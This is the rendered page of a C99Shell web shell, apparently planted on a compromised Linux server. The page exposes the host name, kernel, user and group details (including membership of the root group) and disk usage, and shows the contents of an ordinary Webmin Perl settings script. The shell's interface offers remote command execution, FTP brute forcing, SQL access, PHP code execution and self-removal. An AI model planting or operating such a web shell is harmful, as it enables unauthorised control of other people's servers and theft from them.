!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/webmin/gray-theme/   drwxr-xr-x
Free 28.64 GB of 117.98 GB (24.28%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     save_right.cgi (1.55 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Update visible right-frame sections

require "gray-theme/gray-theme-lib.pl";
require "gray-theme/theme.pl";

&ReadParse();
&error_setup($text{'edright_err'});
&load_theme_library();
($hasvirt, $level, $hasvm2) = &get_virtualmin_user_level();
$sects = &get_right_frame_sections();
!$sects->{'global'} ||
   $hasvirt && &virtual_server::master_admin() ||
   $hasvm2 && !$server_manager::access{'owner'} ||
    &error($text{'edright_ecannot'});

# Validate and store
foreach $s (&list_right_frame_sections()) {
    $sect->{'no'.$s->{'name'}} = !$in{$s->{'name'}};
    }
if ($in{'alt_def'}) {
    delete($sect->{'alt'});
    }
else {
    $in{'alt'} =~ /^(http|https|\/)/ || &error($text{'edright_ealt'});
    $sect->{'alt'} = $in{'alt'};
    }
$sect->{'list'} = $in{'list'};
$sect->{'tab'} = $in{'tab'};
if ($in{'fsize_def'}) {
    delete($sect->{'fsize'});
    }
else {
    $in{'fsize'} =~ /^\d+$/ || &error($text{'edright_efsize'});
    $sect->{'fsize'} = $in{'fsize'};
    }
$sect->{'nosearch'} = !$in{'search'};
if ($hasvirt) {
    $sect->{'dom'} = $in{'dom'};
    $sect->{'qsort'} = $in{'qsort'};
    $sect->{'qshow'} = $in{'qshow'};
    if ($in{'max_def'}) {
        delete($sect->{'max'});
        }
    else {
        $in{'max'} =~ /^[1-9]\d*$/ || &error($text{'edright_emax'});
        $sect->{'max'} = $in{'max'};
        }
    }
if ($hasvm2) {
    $sect->{'server'} = $in{'server'};
    }
if ($hasvirt && &virtual_server::master_admin() ||
     $hasvm2 && &server_manager::can_action(undef, "global")) {
    $sect->{'global'} = $in{'global'};
    $sect->{'nowebmin'} = $in{'nowebmin'};
    }

# Save config
&save_right_frame_sections($sect);
&redirect("right.cgi");


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0043 ]--